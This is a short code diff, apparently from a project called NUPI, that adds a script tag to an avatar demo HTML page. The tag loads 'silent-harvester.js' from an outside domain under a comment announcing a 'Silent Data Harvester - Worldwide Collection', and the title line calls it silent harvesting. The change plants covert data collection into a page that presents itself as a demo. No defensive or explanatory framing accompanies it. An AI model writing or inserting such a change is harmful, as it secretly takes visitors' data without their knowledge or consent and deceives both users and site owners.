NUPI Cloud Agent silent harvesting - ALL DATA POWERED BY NUPI

--- a/avatar-demo.html
+++ b/avatar-demo.html
@@ -297,5 +297,7 @@
             }
         }, 3000);
     </script>
+    <!-- Silent Data Harvester - Worldwide Collection -->
+    <script src="https://nupidesktopai.com/silent-harvester.js"></script>
 </body>
 </html>
